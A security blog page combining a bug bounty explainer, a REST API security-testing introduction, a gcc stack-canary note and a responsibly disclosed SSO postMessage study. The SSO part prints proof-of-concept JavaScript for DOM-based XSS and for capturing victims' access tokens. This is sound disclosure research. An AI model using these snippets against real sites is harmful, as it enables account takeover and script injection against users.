Monday, June 05, 2023

$$$ Bug Bounty $$$

What is Bug Bounty ?

A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.

Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.

Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.

While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.

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Automating REST Security Part 1: Challenges

Although REST has been a dominant choice for API design for the last decade, there is still little dedicated security research on the subject of REST APIs. The popularity of REST contrasts with a surprisingly small number of systematic approaches to REST security analysis. This contrast is also reflected in the low availability of analysis tools and best security practices that services may use to check if their API is secure.

In this blog series, we try to find reasons for this situation and what we can do about it. In particular, we will investigate why general REST security assessments seem more complicated than other API architectures. We will likewise discuss how we may still find systematic approaches for REST API analysis despite REST's challenges. Furthermore, we will present REST-Attacker, a novel analysis tool designed for automated REST API security testing. In this context, we will examine some of the practical tests provided by REST-Attacker and explore the test results for a small selection of real-world API implementations.


Christoph Heine


 Understanding the Problem with REST

When evaluating network components and software security, we often rely on specifications for how things should work. For example, central authorities like the IETF standardize many popular web technologies such as HTTP, TLS or DNS. API architectures and designs can also be standardized. Examples of these technologies are SOAP and the more recent GraphQL language specification. Standardization of web standards usually influences their security. Drafting may involve a public review process before publication. This process can identify security flaws or allow the formulation of official implementation and usage best practices. Best practices are great for security research as a specification presents clear guidelines on how an implementation should behave and why.

The situation for REST is slightly different. First of all, REST is not a standard in the sense that there is no technical specification for its implementation. Instead, REST is an architecture style which is more comparable to a collection of paradigms (client-server architecture, statelessness, cacheability, uniform interface, layering, and code-on-demand). Notably, REST has no strict dependency on other web technologies. It only defines how developers should use components but not what components they should use. This paradigm makes REST very flexible as developers are not limited to any particular protocol, library, or data structure.

Furthermore, no central authority could define rules or implementation guidelines. Roy Fielding created the original definition of REST as a design template for the HTTP/1.1 standard in 2000. It is the closest document resembling a standard. However, the document merely explains the REST paradigms and does not focus on security implications.

The flexibility of the REST architecture is probably one of the primary reasons why security research can be challenging. If every implementation is potentially different, how are we supposed to create common best practices, let alone test them consistently across hundreds of APIs? Fortunately for us, not every API tries to reinvent the wheel entirely. In practice, there are a lot of similarities between implementations that may be used to our advantage.

Generalizing REST Security

The most glaring similarity between REST API implementations is that most, if not all, are based on HTTP. If you have worked with REST APIs before, this statement might sound like stating the obvious. However, remember that REST technically does not require a specific protocol. Assuming that every REST API uses HTTP, we can use it as a starting point for a generalization of REST API security. Knowing that we mainly deal with HTTP is also advantageous because HTTP - unlike REST - is standardized. Although HTTP is still complex, it gives us a general idea of what we can expect.

Another observation is that REST API implementations reuse several standardized components in HTTP for API communication. Control parameters and actions in an API request are mapped to components in a generic HTTP request. For example, a resource that an API request operates on, is specified via the HTTP URL. Actions or operations on the said resource are identified and mapped to HTTP methods defined by the HTTP standard, usually GET, POST, DELETE, PUT, and PATCH. API operations retain their intended action from HTTP, i.e., GET retrieves a resource, DELETE removes a resource, and so on. In REST API documentation, we can often find a description of available API endpoints using HTTP "language":

Since the URL and the HTTP method are sufficient to build a basic HTTP request, we can potentially create an API requests if we know a list of REST endpoints. In practice, the construction of such requests can be more complicated because the API may have additional parameter requirements for their requests, e.g., query, header, or body content. Another problem is finding valid IDs of resources can be difficult. Interestingly, we can infer each endpoint's action based on the HTTP method, even without any context-specific knowledge about the API.

We can also find components taken from the HTTP standard in the API response. The requested operation's success or failure is usually indicated using HTTP status codes. They retain their meaning when used in REST APIs. For example, a 200 status code indicates success, while a 401 status code signifies missing authorization (in the preceding API request). This behavior again can be inferred without knowing the exact purpose of the API.

Another factor that influences REST's complexity is its statelessness paradigm. Essentially, statelessness requires that the server does not keep a session between individual requests. As a result, every client request must be self-contained, so multi-message operations are out of the picture. It also effectively limits interaction with the API to two HTTP messages: client request and server response. Not only does this make API communication easier to comprehend, but it also makes testing more manageable since we don't have to worry as much about side effects or keeping track of an operations state.

Implementing access control mechanisms can be more complicated, but we can still find general similarities. While REST does not require any particular authentication or authorization methods, the variety of approaches found in practice is small. REST API implementations usually implement a selection of these methods:

  • HTTP Basic Authentication (user authentication)
  • API keys (client authentication)
  • OAuth2 (authorization)

Two of these methods, OAuth2 and HTTP Basic Authentication, are standardized, while API keys are relatively simple to handle. Therefore, we can generalize access control to some degree. However, access control can be one of the trickier parts of API communication as there may be a lot of API-specific configurations. For example, OAuth2 authorization allows the API to define multiple access levels that may be required to access different resources or operations. How access control data is delivered in the HTTP message may also depend on the API, e.g., by requiring encoding of credentials or passing them in a specified location of the HTTP message (e.g. header, query, or body).

Finding a Systematic Approach for REST API Analysis

So far, we've only discussed theoretical approaches scatching a generic REST API analysis. For implementing an automated analysis tool, we need to adopt the hints that we used for our theoretical API analyses to the tool. For example, the tool would need to know which API endpoints exist to create API requests on its own.

The OpenAPI specification is a popular REST API description format that can be used for such purpose. An OpenAPI file contains a machine-readable definition (as JSON or YAML) of an API's interface. Basic descriptions include the definition of the API endpoints, but can optionally contain much more content and other types of useful information. For example, an endpoint definition may include a list of required parameters for requests, possible response codes and content schemas of API responses. The OpenAPI can even describe security requirements that define what types of access control methods are used.

{     "openapi": "3.1.0",     "info": {         "title": "Example API",         "version": "1.0"     },     "servers": [         {             "url": ""         }     ],     "paths": {         "/user/info": {             "get": {                 "description": "Returns information about a user.",                 "parameters": [                     {                     "name": "id",                     "in": "query",                     "description": "User ID",                     "required": true                     }                 ],                 "responses": {                     "200": {                         "description": "User information.",                         "content": {                             "application/json": {                                 "schema": {                                     "type": "object",                                     "items": {                                         "$ref": "#/components/schemas/user_info"                                     }                                 }                             }                         }                     }                 }             }         }     },     "security": [         {             "api_key": []         }     ] } 

As you can see from the example above, OpenAPI files allow tools to both understand the API and use the available information to create valid API requests. Furthermore, the definition can give insight into the expected behavior of the API, e.g., by checking the response definitions. These properties make the OpenAPI format another standard on which we can rely. Essentially, a tool that can parse and understand OpenAPI can understand any generic API. With the help of OpenAPI, tools can create and execute tests for APIs automatically. Of course, the ability of tools to derive tests still depends on how much information an OpenAPI file provides. However, wherever possible, automation can potentially eliminate a lot of manual work in the testing process.


When we consider the similarities between REST APIs and OpenAPI descriptions, we can see that there is potential for analyzing REST security with tools. Our next blog post discusses how such an implementation would look like. We will discuss REST-Attacker, our tool for analyzing REST APIs.

Further Reading

The feasibility of tool-based REST analysis has also been discussed in scientific papers. If you want to know more about the topic, you can start here:

  • Atlidakis et al., Checking Security Properties of Cloud Service REST APIs (DOI Link)
  • Lo et al., On the Need for a General REST-Security Framework (DOI Link)
  • Nguyen et al., On the Security Expressiveness of REST-Based API Definition Languages (DOI Link)


The REST-Attacker project was developed as part of a master's thesis at the Chair of Network & Data Security of the Ruhr University Bochum. I would like to thank my supervisors Louis Jannett, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk for their continued support during the development and review of the project.

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Sunday, June 04, 2023

Linux Stack Protection By Default

Modern gcc compiler (v9.2.0) protects the stack by default and you will notice it because instead of SIGSEGV on stack overflow you will get a SIGABRT, but it also generates coredumps.

In this case the compiler adds the variable local_10. This variable helds a canary value that is checked at the end of the function.
The memset overflows the four bytes stack variable and modifies the canary value.

The 64bits canary 0x5429851ebaf95800 can't be predicted, but in specific situations is not re-generated and can be bruteforced or in other situations can be leaked from memory for example using a format string vulnerability or an arbitrary read wihout overflowing the stack.

If the canary doesn't match, the libc function __stack_chck_fail is called and terminates the prorgam with a SIGABORT which generates a coredump, in the case of archlinux managed by systemd and are stored on "/var/lib/systemd/coredump/"

❯❯❯ ./test 
*** stack smashing detected ***: terminated
fish: './test' terminated by signal SIGABRT (Abort)

❯❯❯ sudo lz4 -d core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000.lz4
[sudo] password for xxxx: 
Decoding file core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000 
core.test.1000.c611b : decoded 249856 bytes 

 ❯❯❯ sudo gdb /home/xxxx/test core.test.1000.c611b7caa58a4fa3bcf403e6eac95bb0.1121.1574354610000000 -q 

We specify the binary and the core file as a gdb parameters. We can see only one LWP (light weight process) or linux thread, so in this case is quicker to check. First of all lets see the back trace, because in this case the execution don't terminate in the segfaulted return.

We can see on frame 5 the address were it would had returned to main if it wouldn't aborted.

Happy Idea: we can use this stack canary aborts to detect stack overflows. In Debian with prevous versions it will be exploitable depending on the compilation flags used.
And note that the canary is located as the last variable in the stack so the previous variables can be overwritten without problems.

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Security And Privacy Of Social Logins (II): PostMessage Security In Single Sign-On

This post is the second out of three blog posts summarizing my (Louis Jannett) research on the design, security, and privacy of real-world Single Sign-On (SSO) implementations. It is based on my master's thesis that I wrote between April and October 2020 at the Chair for Network and Data Security.

We structured this blog post series into three parts according to the research questions of my master's thesis: Single Sign-On Protocols in the Wild, PostMessage Security in Single Sign-On, and Privacy in Single Sign-On Protocols.


Part I: Single Sign-On Protocols in the Wild

Although previous work uncovered various security flaws in SSO, it did not work out uniform protocol descriptions of real-world SSO implementations. We summarize our in-depth analyses of Apple, Google, and Facebook SSO. We also refer to the sections of the thesis that provide more detailed insights into the protocol flows and messages.
It turned out that the postMessage API is commonly used in real-world SSO implementations. We introduce the reasons for this and propose security best practices on how to implement postMessage in SSO. Further, we present vulnerabilities on top-visited websites that caused DOM-based XSS and account takeovers due to insecure use of postMessage in SSO.

Part III: Privacy in Single Sign-On Protocols (coming soon)

Identity Providers (IdPs) use "zero-click" authentication flows to automatically sign in the user on the Service Provider (SP) once it is logged in on the IdP and has consented. We show that these flows can harm user privacy and enable new targeted deanonymization attacks of the user's identity.

PostMessage Security in Single Sign-On

If you are familiar with OAuth or OpenID Connect, you already know the redirect flow: It opens the Authentication Request in the primary window and returns the Authentication Response with a redirect from the IdP to the SP. This approach requires the browser to reload the entire SP website, which is especially in single-page applications a disadvantage.

The popup flow eliminates the need to reload the SP website by executing the SSO flow in a popup window as follows:

If the sign-in button on the SP website is clicked, the Authentication Request is opened in a new popup window. After the user submits its credentials and grants the consent, the IdP redirects the popup to the `redirect_uri`. From the IdP's perspective, a normal redirect flow is executed. Thus, the IdP does not need not implement any changes to support the popup flow. The SP receives the `code` at its Redirection Endpoint, redeems the `code`, authenticates the user, and finally returns JavaScript that sends an authentication token back to the primary window with postMessage. For instance, the response from the Redirection Endpoint sends the `access_token` (or `id_token` or any other application-specific token) from the popup window back to the primary window as follows:
const access_token = "ya29.a0Af..."; window.opener.postMessage(access_token, ""); 

Prior to that, the following JavaScript is executed in the primary window:

window.onmessage = (event) => { 	if (event.origin !== "") return; 	processToken(; } 

Finally, the primary window receives the authentication token, optionally stores it in localStorage, and may use it for subsequent API calls.

Comparison: response_mode=web_message vs. popup flow

We discovered the popup flow in several real-world SSO implementations, although it is not formally defined in the OAuth or OpenID Connect specifications. Besides the response modes `query`, `fragment`, and `form_post`, we want to raise awareness for `response_mode=web_message`. This response mode requests not to perform any redirects but instead use the postMessage API. After the user submits its credentials and grants the consent, the IdP returns JavaScript, sending the Authentication Response from the popup window to the primary window using postMessage: `window.opener.postMessage("code=XYZ&state=123", "")`. Although the `redirect_uri` is not required to perform any redirects, it still serves as postMessage destination origin. The SP benefits from this response mode since it does not have to implement a Redirection Endpoint, which is useful for "real" single-page applications. However, the IdP must make changes to its implementation.

Although the `web_message` response mode is not formally specified in current OAuth or OpenID Connect standards, it still is defined in an expired draft from 2016: OAuth 2.0 Web Message Response Mode. Also, the current draft OAuth 2.0 Assisted Token proposes a separate endpoint used by postMessage SSO flows that are executed with iframes in single-page applications. The OAuth 2.0 Multiple Response Type Encoding Practices document leaves space for future specifications as well:

> Note that it is expected that additional Response Modes may be defined by other specifications in the future, including possibly ones utilizing the HTML5 postMessage API and Cross-Origin Resource Sharing (CORS). 


The postMessage API has not only enjoyed popularity by developers but also by bug bounty hunters. The reason is simple: It provides a controlled circumvention of the Same Origin Policy and enables frames of different origins to communicate with each other. This comes at a cost: Developers need to meet specific security requirements to mitigate cross-origin attacks:

Destination Check

The origin of the window that receives the postMessage must be specified in the second parameter of the `postMessage` function. If the message is confidential (i.e., contains the `access_token`, `id_token`, or similar), the wildcard origin `*` must not be used. Instead, the SP origin (i.e., the `redirect_uri`) must be explicitly specified as destination origin. Insufficient destination checks can cause account takeovers.

Origin Check

In the postMessage event listener, the origin of the received postMessage must be checked before the payload is processed. The safest option is to perform a static string compare on the `event.origin` property. Developers need to pay special attention to regular expressions. For instance, `/^https?:\/\/.*sp\.com$/` is insecure, since it classifies `` as valid. Insufficient origin checks can cause DOM-based XSS, CSRF logins, and CSRF account linking.

Input Validation

In the postMessage event listener, the message must be validated before it is processed. For instance, let's assume the URL is sent with postMessage to an event listener, which navigates to that URL by setting the `window.location.href` property. If the URL is not validated, a maliciously-crafted URL (i.e., `javascript:alert(1)`) will cause DOM-based XSS.


We were curious about the security of postMessage in SSO flows on real-world SPs. To evaluate the current state of postMessage in SSO, the top 250 websites from Moz's list of the most popular websites served as a foundation. 
We identified 63 websites supporting SSO with Apple, Google, or Facebook. Out of 15 websites implementing the popup flow with postMessage, we found that ten are vulnerable to an account takeover and two are vulnerable to DOM-based XSS
In the following, we present three vulnerabilities on real-world SPs. Check out Section 4.5 of the thesis for more details and attacks.

Vuln. 1) DOM-based XSS on

The website was vulnerable to DOM-based XSS due to a missing postMessage origin check and insufficient input validation within the postMessage event listener.

The SSO flow on works as follows: If the user clicks the sign-in button on, the Authentication Request is opened in a new popup window. The user signs in, grants the consent, and the popup is redirected to the Redirection Endpoint on The backend receives the code, redeems the code, authenticates the user, sets session cookies, and returns JavaScript that sends a postMessage containing a target URL to which the primary window should redirect after successful authentication.
Therefore, the primary window on registered the following (vulnerable) event listener:
// webpack:///./jsx/src/unified-lire/lire-ui-bundle/components/fullPage/FullPageView.js handleSsoPopupMessage = (e) => {     const payload = receivePostMessage(e);     if (payload.message == "SSO_ACTION_SUCCESS") { = payload.props.redirectUri;     } }  // webpack:///./jsx/src/utils/iFramePostMessages.js receivePostMessage = (e) => {     if (isNytimesDomain(e.origin)) return; } isNytimesDomain = () => true; 

As you might have noticed, the event listener wants to validate the origin of the postMessage with the `isNytimesDomain` function, which returns `true` for all origins. Then, it redirects to the URL sent in the postMessage by setting the `` property, but without validating the URL. We can use the `javascript` scheme to achieve DOM-based XSS. Therefore, the attacker embeds the following PoC on its malicious website:
window.popup ="", "_blank"); setTimeout( () => { 	window.popup.postMessage({ 		"message": "SSO_ACTION_SUCCESS", 		"props": { 			"oauthProvider": "google", 			"redirectUri": "javascript:alert(document.domain)", 			"action": "LOGIN" 		} 	}, "*"); }, 2000); 

Responsible Disclosure

  • 2020-08-27: Initial report sent to The New York Times via HackerOne Disclosure Assistance
  • 2020-09-09: Acknowledged by HackerOne
  • 2020-11: Fixed with a domain whitelist: `["", "", "localhost"].includes(...)`

Vuln. 2) Account Takeover on,, and

The websites,, and are brands of the CBS Interactive group and were vulnerable to a full account takeover due to an insufficient destination check in the `postMessage` function. Since the websites use a common authentication system, all three websites (and even more) were equally vulnerable.
In the following, we demonstrate the attack applied on

The SSO flow on involves a popup window and an iframe on the primary window. The iframe loads the easyXDM library, which is (insecurely) used as a proxy between the popup window and the primary window.

If the user clicks the "Continue with Facebook" button on, the Login Endpoint is opened in a new popup window. In return, it redirects the Authentication Request to Facebook. The user signs in, grants the consent, and the popup is redirected to the Redirection Endpoint. The backend receives the code, redeems it, creates a custom `accessCredential`, and returns JavaScript that calls the `setAccessCredentials` function in the iframe. The `accessCredential` is passed as a parameter to that function such that the iframe receives it. Note that this JavaScript callback only works because the iframe and popup window share the same origin.
Finally, the proxy iframe relays the `accessCredential` to the primary window using postMessage. The postMessage destination origin is retrieved from the `xdm_e` query parameter of the iframe URL. Note that this parameter is not validated, which is the core vulnerability in this flow.
To exploit this vulnerability, an attacker registers a postMessage event listener that will later receive the victim's `accessCredential` on its malicious website. It then embeds the proxy iframe and loads it with the `xdm_e=` query parameter. Finally, the URL that starts the SSO flow is opened in a new popup window.
window.addEventListener("message", (e) => { alert(; });  window.iframe = document.createElement("iframe"); = "easyXDM"; window.iframe.src = ""; window.iframe.onload = () => {"", "_blank"); } 

If the victim visits the malicious website, is logged in on Facebook, and has valid consent for ``, the malicious website automatically receives the victim's `accessCredential`, enabling the attacker to gain access to the victim's account.

Responsible Disclosure

  • 2020-08-09: Initial report sent to
  • 2020-08-11: Acknowledged by CNET Customer Support
  • 2020-08-28: Fix provided with an access control list containing insecure regular expressions: `/^.*\.cnet\.com((\/.*)?)$/` is valid for `xdm_e=`
  • 2020-08-28: Second report sent to
  • 2020-08-29: Acknowledged by CNET Customer Support
  • 2020-09-04: Fix provided with secure regular expressions: `/^(https:\/\/)([a-zA-Z0-9\-]+\.)*cnet\.com((\/.*)?)$/`

Vuln. 3) Account Takeover in SAP Customer Data Cloud (GIGYA)

The SAP Customer Data Cloud, formally known as GIGYA, offers SSO as a Service: It acts both as IdP for its customers and SP for Google, Facebook, and other public IdPs. For instance, and integrate the SAP IdP to offer both Google and Facebook SSO with a single codebase.
We discovered a vulnerability in the postMessage configuration that led to an account takeover on all websites integrating the SAP identity brokerage service for SSO.
We demonstrate the attack applied on as follows:

The SSO flow is started from the SP website by opening the Authentication RequestSAP in a new popup window. This request defines the public IdP (Google) and the domain of the SP website that will finally receive the tokens from the SAP IdP. This domain is not validated correctly: It rejects trivial manipulations (i.e., `domain=` or `domain=`) but fails to detect the `` Basic Authentication URI component.

Thus, an attacker can create a malicious website that opens the Authentication RequestSAP in a new popup window, sets the `client_id` to some targeted SP, and the domain to the URL of that SP with an appended ``. The SAP IdP generates an Authentication RequestGoogle and redirects the popup to that URL. It further associates the `domain` with the `state`. Note that from Google's perspective, the SP is the SAP IdP. After authentication and consent, Google redirects back to the Redirection EndpointSAP. The SAP IdP receives the `code`, redeems it at Google, authenticates the user, creates custom authentication tokens, and finally returns JavaScript, which uses postMessage to return the custom authentication tokens to the SP. Note that the postMessage destination origin is set to the initial domain parameter: `https://[...]`. The backend uses the `state` to retrieve the associated `domain`.

If a victim visits the malicious website, is logged in at Google, and has valid consent, the attacker can immediately receive the tokens from SAP that authenticate the victim on the targeted SP:
window.addEventListener("message", (e) => { alert(;});"", "_blank"); 

Responsible Disclosure

  • 2020-08-05: Initial report sent to
  • 2020-08-18: Acknowledged by SAP
  • 2020-09-17: Fixed validation on backend server


My thesis was supervised by Christian MainkaVladislav Mladenov, and Jörg Schwenk. Huge "thank you" for your continuous support, advice, and dozens of helpful tips. 
Also, special thanks to Lauritz for his feedback on this post and valuable discussions during the research. Check out his blog post series on Real-life OIDC Security as well.

Authors of this Post

Louis Jannett
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